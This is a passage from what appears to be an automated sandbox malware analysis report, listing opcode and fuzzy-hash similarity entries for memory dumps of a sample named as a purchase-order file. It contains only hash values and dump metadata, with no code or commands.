                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5f0bf7bab0164bea8955eb5503362b84ce878342d5183750c6fcec1295bf2e96
                                              • Instruction ID: 0e3ad9901cdca805ef6247b0f5a661bfd9b7d04a483098a6cba3e47c195568a3
                                              • Opcode Fuzzy Hash: 5f0bf7bab0164bea8955eb5503362b84ce878342d5183750c6fcec1295bf2e96
                                              • Instruction Fuzzy Hash: 1CE09A72C542089FCB04DFA8D8093ACBFF4EB04222F2007B98828A22C0E7700F80CB41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c462ec57ce7ae7d0e5125a0b0671ab1f47992aedd8223a3079cbd49da7e1fd20
                                              • Instruction ID: 94eaa226acd88e42c4aff04a0e7d72d5110cd25700414d811ab002b9a4a60269
                                              • Opcode Fuzzy Hash: c462ec57ce7ae7d0e5125a0b0671ab1f47992aedd8223a3079cbd49da7e1fd20
                                              • Instruction Fuzzy Hash: 69E0DF3464A250DBE71ADA90D845979BB38EB4320AF20A4CCC88AE7263CB324E07C740
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2cb3a02d1156ed7b248b7cae9b3e9f8de5b5f58f3103a64bbf9555d079ec048
                                              • Instruction ID: 5eb7523b9c08e97dfc7e4d116881216d750adad1dc597dd5a97e9540491675c6
                                              • Opcode Fuzzy Hash: f2cb3a02d1156ed7b248b7cae9b3e9f8de5b5f58f3103a64bbf9555d079ec048
                                              • Instruction Fuzzy Hash: 0DE0D830949348DBDB04DB68D94676CBB74EB42314F3491DCC8446B341C731BE42DB85
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb2489d97c42412b93192766cd48373f0a5bedfa0ab1ac146155e6470c85ac2f
                                              • Instruction ID: 968d4a5a6a38956ecd46bfcb315cb8a70e2e63facf13517ee6e14cd7c5de3888
                                              • Opcode Fuzzy Hash: fb2489d97c42412b93192766cd48373f0a5bedfa0ab1ac146155e6470c85ac2f
                                              • Instruction Fuzzy Hash: 1BF0A575D44208EFCB54EFA9D940A9CFBB5EB49314F10C0AA9818A7750D6719A51DF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c186b814c931904cde3f1520939e6a1c605752ba95886e4afae92092dd01be3e
                                              • Instruction ID: 4ffb8e85bd1271b613e7219df2c4a6bc6ae53f8f71bb8e0bf94427b05e974a94
                                              • Opcode Fuzzy Hash: c186b814c931904cde3f1520939e6a1c605752ba95886e4afae92092dd01be3e
                                              • Instruction Fuzzy Hash: C2F0C974E04208EFCB45DFA9D548A9DBBF4EB49300F14D4ADD814A7321D6709E50DF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b92c52ac71818168150a885d5cba00c2d64597a6c450eb1e6afeab829ddc325a
                                              • Instruction ID: 4b87f4416abc36ddcc7976eec3a52584c2399f01b764681d9e575b2376f8d320
                                              • Opcode Fuzzy Hash: b92c52ac71818168150a885d5cba00c2d64597a6c450eb1e6afeab829ddc325a
                                              • Instruction Fuzzy Hash: E1E06D74D04208EFCB44DFA9D548A9DBBF8FF49300F1080E9D814A7310D230AA40CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1750b9a07dd7df2b5d248009fd20e3232a0fc462cc625dd3908d989a6bcdb77d
                                              • Instruction ID: 3a1901aff360834f1d70e66b4a0c9c6a1157d53b3e63c8c1a7235ecd8dab1f44
                                              • Opcode Fuzzy Hash: 1750b9a07dd7df2b5d248009fd20e3232a0fc462cc625dd3908d989a6bcdb77d
                                              • Instruction Fuzzy Hash: DCF0B774916369CBDB14DF69E88C79DB7B1BB49301F1045E5D409A7284DB785E80CF42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 73a6ce04c5b5a209dc068763db048a990fc7038d5ed76793bcf6c4290d142507
                                              • Instruction ID: 4c337472fe2f17b4e5ef2242887c6492c565a68bd2188dadfc861c4ff238f2f8
                                              • Opcode Fuzzy Hash: 73a6ce04c5b5a209dc068763db048a990fc7038d5ed76793bcf6c4290d142507
                                              • Instruction Fuzzy Hash: 85E0C23188A328DBD718DA55CC05B6A7368DB02214F2021A8C84496A00C77A8800CBC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93e29619b7f4e3ee611e563f3a2fbd00a05c89615369d3709bb02ad943d75026
                                              • Instruction ID: ad71fea1299ef808b44adbd3a1e783c73c47011c293678b80f1046cf2c40a2d8
                                              • Opcode Fuzzy Hash: 93e29619b7f4e3ee611e563f3a2fbd00a05c89615369d3709bb02ad943d75026
                                              • Instruction Fuzzy Hash: E4E07D307003048FCB28A1A46C4172536965B85700F542CEDEB069F2C0D9B1FC41C352
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 725cb27898f49a19e6dd52d6c7284d17385bd8f6580412a3ccfaeb143b55bbbc
                                              • Instruction ID: b639fdc4de5d62df42e2344b72819822d7e7cbe89d8ad24e1a45c89ccbfebce2
                                              • Opcode Fuzzy Hash: 725cb27898f49a19e6dd52d6c7284d17385bd8f6580412a3ccfaeb143b55bbbc
                                              • Instruction Fuzzy Hash: BAE0A574D04208EFCB84DFA9D440A9CFBB4EB49210F10C4A99818A3350D6319A51DF81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 725cb27898f49a19e6dd52d6c7284d17385bd8f6580412a3ccfaeb143b55bbbc
                                              • Instruction ID: e354636e88375c9aa70e585de52c699022295a54debd986685fb4ea060029fe7
                                              • Opcode Fuzzy Hash: 725cb27898f49a19e6dd52d6c7284d17385bd8f6580412a3ccfaeb143b55bbbc
                                              • Instruction Fuzzy Hash: 22E0AE74E04308EFCB84DFA9D840AADFBB4AB49310F20C4AA9828A3351D7319A51DF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 725cb27898f49a19e6dd52d6c7284d17385bd8f6580412a3ccfaeb143b55bbbc
                                              • Instruction ID: 4f2e0831c0552115147b4cc80dc63f96a244fa32af0f40fc6773265777788b15
                                              • Opcode Fuzzy Hash: 725cb27898f49a19e6dd52d6c7284d17385bd8f6580412a3ccfaeb143b55bbbc
                                              • Instruction Fuzzy Hash: EDE0C974D04208EFCB84DFA9D540A9CFBF4EB59310F10C4A99C58A3350D7359A51DF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51c14f1023f112c72b39e4aba9d7056c4c936721e1055a78397efaaf0369ba7e
                                              • Instruction ID: 5e8ab33931ebb17cc104fbe4503130d2fdd2d71f15b61729245f4b635eac79f4
                                              • Opcode Fuzzy Hash: 51c14f1023f112c72b39e4aba9d7056c4c936721e1055a78397efaaf0369ba7e
                                              • Instruction Fuzzy Hash: EBE0E5B4E14208EFCB58DFAAD548A9CBBF8FF49300F1084E9D818A7720D6349A40DF41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 191c5124cfcc7d887f9d279bb2e4a0ab54824abee996bd4e2e3513ca5ed9d2b8
                                              • Instruction ID: cb62be35bba62a80655ab8a33152cd2d4a4344dcd1a695379ffe2b7c718c3670
                                              • Opcode Fuzzy Hash: 191c5124cfcc7d887f9d279bb2e4a0ab54824abee996bd4e2e3513ca5ed9d2b8
                                              • Instruction Fuzzy Hash: 55E0E574E04208EFCB84DFA9D4446ACFBF4EB49200F20C4EDC819A3351D6319A41DF84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction ID: f0c6214bd5e2b53b805a0c9414e557f7b266592f86b258b728abf2eec1575842
                                              • Opcode Fuzzy Hash: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction Fuzzy Hash: A1E0E574E04208EFCB84DFA9D4456ACFBF4EB49214F21C4E98828A3341D731AA42CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction ID: a614561c9134c9430baf93dc69c880d0e0d767146db563c304e02ab6b312c50e
                                              • Opcode Fuzzy Hash: c30162dd38f362ed69d8ad2485301d7ec9cbe8ba17549be8e0b8c7450e502531
                                              • Instruction Fuzzy Hash: 56E0C274E04208EFCB84DFA9D4406ACFBF5EB49200F20C4AA9828A3340D6319A42CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e73550fe32e01cd516aae1e79c9436c4735317846bcbb9f9410840b1432bd2d0
                                              • Instruction ID: cd094128b60c70abca03ccd0bcb4800ba6102768c46273a6821d4c2e76ef679c
                                              • Opcode Fuzzy Hash: e73550fe32e01cd516aae1e79c9436c4735317846bcbb9f9410840b1432bd2d0
                                              • Instruction Fuzzy Hash: C5E0E574D08208AFCB08DF95D544AACFBB9EB49210F24C4AA985567391D6319A91EF84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 603f2a2f9ae0db31a0baa231bd35864336d164ca23853ffc8468db3a56b2c616
                                              • Instruction ID: 5833516f2832f7a2e92bd9982bfbbe2976eb4111a3b9f75f2a52979eb518b825
                                              • Opcode Fuzzy Hash: 603f2a2f9ae0db31a0baa231bd35864336d164ca23853ffc8468db3a56b2c616
                                              • Instruction Fuzzy Hash: 4AE01A74E04308EFCF48DFA9D4046ACBBB9BB49300F2084EA8818A3300D7345A40DF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 194d311227e845ec9325a75a1d09af11190914a7c40e09ff7d1d31979d0e5c69
                                              • Instruction ID: 6928abd0477221cc37c5a64bc7337e9ba472685cc4e23ddced95b3e061b615d8
                                              • Opcode Fuzzy Hash: 194d311227e845ec9325a75a1d09af11190914a7c40e09ff7d1d31979d0e5c69
                                              • Instruction Fuzzy Hash: E0E04FB5D08308EFC744DBA4D84496DFFB8AB46311F20C499DC5567341C631AA51DB94
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71a500bc455283664a385edd1ab664e39fd1ad0b844dc855c89ee90986bb19a6
                                              • Instruction ID: 53b861be4741a38d4042df912272ba2c70efbb874df9d7a131d33cd066481263
                                              • Opcode Fuzzy Hash: 71a500bc455283664a385edd1ab664e39fd1ad0b844dc855c89ee90986bb19a6
                                              • Instruction Fuzzy Hash: CEE08C74D08208EBCB08DFA5E8459ACFBB9EB46310F24C4A9DC0627350C6329E92DB84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03e7d29380d32abbe30d708b995222fe6b2e068bc5c0edf000edd8e545064aa1
                                              • Instruction ID: b038c1ed992452a8449512a8f4b6ebdeff43d7c73308647f5c2c2f6a2dfdb2b2
                                              • Opcode Fuzzy Hash: 03e7d29380d32abbe30d708b995222fe6b2e068bc5c0edf000edd8e545064aa1
                                              • Instruction Fuzzy Hash: D9E04F70A01209DFCB54DFB8E8456AC77B6EB8521576061F9D489D3750EF325E81CB01
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c49577c91cab350bc3bc0ebdddda1aa45d59f90784345c8129ce2b1c519125cd
                                              • Instruction ID: b4c08bd3e65197b3896be1d7bb25abd8c3f10b565859e6ab4464a0991a9b5d90
                                              • Opcode Fuzzy Hash: c49577c91cab350bc3bc0ebdddda1aa45d59f90784345c8129ce2b1c519125cd
                                              • Instruction Fuzzy Hash: 34E02B35745310CFDB28A660AD41B613B626B48352F185DEEDA059F1C0D6B1E841C302
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a0c3ab15bfc82e2a003076b125bb191ff0552f3779b533aaebded7923e99deb
                                              • Instruction ID: d5a1212fa327115919b0a2e751f321d50ee8d18afab41bcf08f80b52ae9277a1
                                              • Opcode Fuzzy Hash: 9a0c3ab15bfc82e2a003076b125bb191ff0552f3779b533aaebded7923e99deb
                                              • Instruction Fuzzy Hash: 44E04FB5E102089BDB04EBF4EE517AD77B1EB88210F1047A9D41597280FA316F029B50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06c4b8aa102be8bcc5ee468f27a4946dcca90a51212745362ce0830a5bdad703
                                              • Instruction ID: 8837ee0ad0e65d4f386b7eb04131534747ccaed531d4404eec17fbbca6042269
                                              • Opcode Fuzzy Hash: 06c4b8aa102be8bcc5ee468f27a4946dcca90a51212745362ce0830a5bdad703
                                              • Instruction Fuzzy Hash: 5DE0DF71E02208DFCB40EBB4EA1579D7BF1EF44321F100BD9C00A93380E9306E048B82
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2449ec7037c7c826362bae841896e2e1a31990edbd5d2043bd7e524117dbfafc
                                              • Instruction ID: a887a0da8b755ee882b9e4f9e6ad82899c0189fc6ebeb8cb260ffdc97ec3a46d
                                              • Opcode Fuzzy Hash: 2449ec7037c7c826362bae841896e2e1a31990edbd5d2043bd7e524117dbfafc
                                              • Instruction Fuzzy Hash: 32E04F34D04208DFC784EFA8D44069CFBF8AB09200F2084E98C18D3340E7319E42CF80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f33cb706dd73c7764fb0fd6e55450429e224790583383570d97bdb2179b1e908
                                              • Instruction ID: 6d327c8253dd37a5c14223a52593eab511bb4da25c49ebe853b8cf5ca8897910
                                              • Opcode Fuzzy Hash: f33cb706dd73c7764fb0fd6e55450429e224790583383570d97bdb2179b1e908
                                              • Instruction Fuzzy Hash: 3FE02234404196CFC365DBA0D855BD5BBB0EF4E309F5941D6C0296B682DB30AA88CFA1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 370339da12430e0faa778726a98ec762319cf11a418b53b5ee33f34d5a143f7c
                                              • Instruction ID: 7cb4aaa09a037b30162572ec3243f427567936eb5ff20793099b526e92b44e04
                                              • Opcode Fuzzy Hash: 370339da12430e0faa778726a98ec762319cf11a418b53b5ee33f34d5a143f7c
                                              • Instruction Fuzzy Hash: EDE01A34D08218EFCB44DB95D4416ACFBB4EB89310F2080E98C6867381D7355A41DF91
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de34ed9382aa772898ddd750b544ad671c78af03e539d4694536d404d189dedc
                                              • Instruction ID: e2c14190c2d5f958d3ece9be95fa138245aed011caf9e0bac530b6b67c8f68ff
                                              • Opcode Fuzzy Hash: de34ed9382aa772898ddd750b544ad671c78af03e539d4694536d404d189dedc
                                              • Instruction Fuzzy Hash: 23E0EC74D55208DFCB44DFB9D5496ACBFF8AB05211F2045A98809A3250E7705F90CB41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485485709.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5c90000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e208671cfabd548221af9d374a765acc990114bf7ede467bdf935cc813696e6
                                              • Instruction ID: 1d632344dc961d08d2147fa98e30e2dd9c470fde7b5ddad02dea52362c4ca1f6
                                              • Opcode Fuzzy Hash: 1e208671cfabd548221af9d374a765acc990114bf7ede467bdf935cc813696e6
                                              • Instruction Fuzzy Hash: 67E0C234909208DBCB08DF95E84996CFBB8FB46300F2094DCC80837341CB315E42CB80
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486411765.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5e70000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4e7091140b057e4f02fc8c7257db516ab4bccf31127d495fe18164f72044b35
                                              • Instruction ID: fb929ca7e2a21a877963cf712dbe2d38a2aae418d30aca4690bdee6053dc0653
                                              • Opcode Fuzzy Hash: e4e7091140b057e4f02fc8c7257db516ab4bccf31127d495fe18164f72044b35
                                              • Instruction Fuzzy Hash: CEE08C34949308DBCB04DF94E8459ACBBB9AB46304F2091DCC80827341CB316E42CF81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1472580389.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2780000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5919d2a2020fdf3f0bcb26ce7aa9cc81d98549bc26a72fc341d7bc8e4b310496
                                              • Instruction ID: 16855fe1b1f80d9b5d1c512f99388c15144bd51f8687d44d620336a49ec4aaa0
                                              • Opcode Fuzzy Hash: 5919d2a2020fdf3f0bcb26ce7aa9cc81d98549bc26a72fc341d7bc8e4b310496
                                              • Instruction Fuzzy Hash: C5E0C272840308DFDB06EFF5D408B5EB7F8DB46201F1008E99444A3210EB714E109BA6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 252f0e306237b1470d9f09caf03eb2618da5d68fac91657e530cf8763d8119ee
                                              • Instruction ID: 082d75d3e10dd66bd302b281a5a183a11ced98c8b8ee8affa2647eff5b8bc904
                                              • Opcode Fuzzy Hash: 252f0e306237b1470d9f09caf03eb2618da5d68fac91657e530cf8763d8119ee
                                              • Instruction Fuzzy Hash: EEE04F30A01209DFCB54EFB8E44556CB7B5EB452147A051B8D489D3300EF326E80CB41
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68c595a61554c8ddf1d72af0131670bf2f6d543aa2c962bbe61c50dd962856b8
                                              • Instruction ID: 848001256264c4ece87b5b2bfb0e254b2b22c73660d78572349d8f9c7c39542a
                                              • Opcode Fuzzy Hash: 68c595a61554c8ddf1d72af0131670bf2f6d543aa2c962bbe61c50dd962856b8
                                              • Instruction Fuzzy Hash: 92D02B3430439547C725826EE8027A23FD2ABC9A0CF4009ADF405C7714EA10DD4587C0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 29bd10676ca65bac2c5e2b46af69027a788584feda18b2aac31b13576e1df94a
                                              • Instruction ID: 2e952594b54dccc39362d91ef38a52acd89857111986143ec94fd3b5d064396f
                                              • Opcode Fuzzy Hash: 29bd10676ca65bac2c5e2b46af69027a788584feda18b2aac31b13576e1df94a
                                              • Instruction Fuzzy Hash: 8BD097E3C201542BC505FB7A48F9ACCBF00AD320303150FC8A033C10E0DD30A12F800A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1485615821.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5cc0000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a4d0ad1409556c2db29583bc47366fd73cefb1c680691829d0282eff12a7da9
                                              • Instruction ID: 2dd55192e933abd0ddb91697176e3c940e3f0e8cf17804c88d6725d19c3cf2a8
                                              • Opcode Fuzzy Hash: 6a4d0ad1409556c2db29583bc47366fd73cefb1c680691829d0282eff12a7da9
                                              • Instruction Fuzzy Hash: 83E086B60892C4DFC703C725D8458803F749F1761032D64DBF1448F172E222A958C755
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1486966067.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 06140000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6140000_PO_9876563647-FLOWTRONIX (FT)UUE.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
